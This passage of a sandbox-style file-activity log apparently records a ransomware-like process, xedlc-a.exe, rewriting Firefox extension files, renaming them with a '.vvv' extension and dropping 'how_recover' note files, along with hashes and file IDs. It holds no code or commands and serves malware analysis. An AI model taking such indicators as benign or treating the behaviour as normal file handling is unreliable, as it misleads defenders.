- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778346
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79384
- mode: close
- sequenceNumber: 1204
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778346
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79393
- mode: open
- sequenceNumber: 1205
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\light-traits.js
- filesize: 23934
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765862
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79502
- mode: close
- sequenceNumber: 1206
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\light-traits.js
- filesize: 24350
- md5sum: 105eaaf5ae01eb9fcfa08e0e1f175803
- sha1sum: b099c5422f3842d2f49cd19cc7d2d792768df7d7
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765862
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79515
- mode: rename
- sequenceNumber: 1207
- filesize: 24350
- md5sum: 105eaaf5ae01eb9fcfa08e0e1f175803
- sha1sum: b099c5422f3842d2f49cd19cc7d2d792768df7d7
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\light-traits.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\light-traits.js.vvv
- ads:
- fid (ads:): 281474976765862
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79527
- mode: open
- sequenceNumber: 1208
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\list.js
- filesize: 5363
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765873
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79562
- mode: close
- sequenceNumber: 1209
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\list.js
- filesize: 5790
- md5sum: bc867b0f9593076124493465fc4e4e67
- sha1sum: 24fa9687d178c04361a03597d5fb0e9abfa615de
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765873
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79575
- mode: rename
- sequenceNumber: 1210
- filesize: 5790
- md5sum: bc867b0f9593076124493465fc4e4e67
- sha1sum: 24fa9687d178c04361a03597d5fb0e9abfa615de
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\list.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\list.js.vvv
- ads:
- fid (ads:): 281474976765873
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79586
- mode: open
- sequenceNumber: 1211
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\match-pattern.js
- filesize: 5222
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765899
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79679
- mode: close
- sequenceNumber: 1212
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\match-pattern.js
- filesize: 5646
- md5sum: 1ca61ddf2f3582667e8cd138a32e668b
- sha1sum: 6e95e5689cdfbfe12be67346b9d93808aeded733
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765899
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79693
- mode: rename
- sequenceNumber: 1213
- filesize: 5646
- md5sum: 1ca61ddf2f3582667e8cd138a32e668b
- sha1sum: 6e95e5689cdfbfe12be67346b9d93808aeded733
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\match-pattern.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\match-pattern.js.vvv
- ads:
- fid (ads:): 281474976765899
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79704
- mode: open
- sequenceNumber: 1214
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\memory.js
- filesize: 4754
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765887
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79757
- mode: close
- sequenceNumber: 1215
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\memory.js
- filesize: 5182
- md5sum: 32ea96f216cda96253623e82bb442152
- sha1sum: 2fe3bc6cccb88f0be7a26491d0fd10b37173c81d
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765887
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79769
- mode: rename
- sequenceNumber: 1216
- filesize: 5182
- md5sum: 32ea96f216cda96253623e82bb442152
- sha1sum: 2fe3bc6cccb88f0be7a26491d0fd10b37173c81d
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\memory.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\memory.js.vvv
- ads:
- fid (ads:): 281474976765887
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79782
- mode: open
- sequenceNumber: 1217
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\observer-service.js
- filesize: 7573
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765889
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79865
- mode: close
- sequenceNumber: 1218
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\observer-service.js
- filesize: 7998
- md5sum: 13f9f3d1b95970fcae6f14e76feebd86
- sha1sum: c308bde3271469c27c125b0e18d366c7c23fd470
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765889
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79878
- mode: rename
- sequenceNumber: 1219
- filesize: 7998
- md5sum: 13f9f3d1b95970fcae6f14e76feebd86
- sha1sum: c308bde3271469c27c125b0e18d366c7c23fd470
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\observer-service.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\observer-service.js.vvv
- ads:
- fid (ads:): 281474976765889
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79891
- mode: open
- sequenceNumber: 1220
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\passwords\utils.js
- filesize: 5249
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765860
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79971
- mode: close
- sequenceNumber: 1221
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\passwords\utils.js
- filesize: 5678
- md5sum: 848cfff8fdc46e3046403e20ab3d7e22
- sha1sum: 278195def80c4bcad2fa63f6a115843dfcb9bdd0
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765860
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79984
- mode: rename
- sequenceNumber: 1222
- filesize: 5678
- md5sum: 848cfff8fdc46e3046403e20ab3d7e22
- sha1sum: 278195def80c4bcad2fa63f6a115843dfcb9bdd0
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\passwords\utils.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\passwords\utils.js.vvv
- ads:
- fid (ads:): 281474976765860
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80112
- mode: created
- sequenceNumber: 1223
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\passwords\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778347
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80121
- mode: close
- sequenceNumber: 1224
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\passwords\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778347
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80175
- mode: created
- sequenceNumber: 1225
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\passwords\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778348
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80184
- mode: close
- sequenceNumber: 1226
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\passwords\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778348
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80194
- mode: open
- sequenceNumber: 1227
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\plain-text-console.js
- filesize: 3668
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476265
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80203
- mode: close
- sequenceNumber: 1228
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\plain-text-console.js
- filesize: 4094
- md5sum: 9e1c6a336028adfdfd22e31081488466
- sha1sum: fb9df2ccb27c4ff8d79a4949a4a2b8b3cd343489
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476265
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80217
- mode: rename
- sequenceNumber: 1229
- filesize: 4094
- md5sum: 9e1c6a336028adfdfd22e31081488466
- sha1sum: fb9df2ccb27c4ff8d79a4949a4a2b8b3cd343489
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\plain-text-console.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\plain-text-console.js.vvv
- ads:
- fid (ads:): 562949953476265
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80232
- mode: open
- sequenceNumber: 1230
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\preferences-service.js
- filesize: 5370
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765886
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80356
- mode: close
- sequenceNumber: 1231
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\preferences-service.js
- filesize: 5790
- md5sum: 86bb14370a6fed2120384827abd3ce8a
- sha1sum: 7d7fc304aff43ba4b4d8c53375b912331ae8d208
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765886
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80370
- mode: rename
- sequenceNumber: 1232
- filesize: 5790
- md5sum: 86bb14370a6fed2120384827abd3ce8a
- sha1sum: 7d7fc304aff43ba4b4d8c53375b912331ae8d208
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\preferences-service.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\preferences-service.js.vvv
- ads:
- fid (ads:): 281474976765886
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80384
- mode: open
- sequenceNumber: 1233
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\runtime.js
- filesize: 2103
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765907
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80512
- mode: close
- sequenceNumber: 1234
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\runtime.js
- filesize: 2526
- md5sum: 5426268d0b362c7ec02cf1b996202cb0
- sha1sum: 2975a683004a958615a7f60da8b00135c6f77615
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765907
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80524
- mode: rename
- sequenceNumber: 1235
- filesize: 2526
- md5sum: 5426268d0b362c7ec02cf1b996202cb0
- sha1sum: 2975a683004a958615a7f60da8b00135c6f77615
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\runtime.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\runtime.js.vvv
- ads:
- fid (ads:): 281474976765907
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80536
- mode: open
- sequenceNumber: 1236
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\securable-module.js
- filesize: 31689
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765876
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80652
- mode: close
- sequenceNumber: 1237
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\securable-module.js
- filesize: 32110
- md5sum: 2415183ef558288232620001fae49ebb
- sha1sum: b9ac094b2f4734580c6903ecf53ee67e1e81079d
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765876
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80665
- mode: rename
- sequenceNumber: 1238
- filesize: 32110
- md5sum: 2415183ef558288232620001fae49ebb
- sha1sum: b9ac094b2f4734580c6903ecf53ee67e1e81079d
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\securable-module.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\securable-module.js.vvv
- ads:
- fid (ads:): 281474976765876
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80677
- mode: open
- sequenceNumber: 1239
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\self-e10s-adapter.js
- filesize: 3624
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765890
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80686
- mode: close
- sequenceNumber: 1240
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\self-e10s-adapter.js
- filesize: 4046
- md5sum: 424ba45ee7bbc87b15ea2813e5040fa7
- sha1sum: 79d3685cd58e13dc8473e68df03e4b8506101a75
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765890
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80700
- mode: rename
- sequenceNumber: 1241
- filesize: 4046
- md5sum: 424ba45ee7bbc87b15ea2813e5040fa7
- sha1sum: 79d3685cd58e13dc8473e68df03e4b8506101a75
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\self-e10s-adapter.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\self-e10s-adapter.js.vvv
- ads:
- fid (ads:): 281474976765890
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80712
- mode: open
- sequenceNumber: 1242
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\self-maker.js
- filesize: 1024
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476243
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80722
- mode: close
- sequenceNumber: 1243
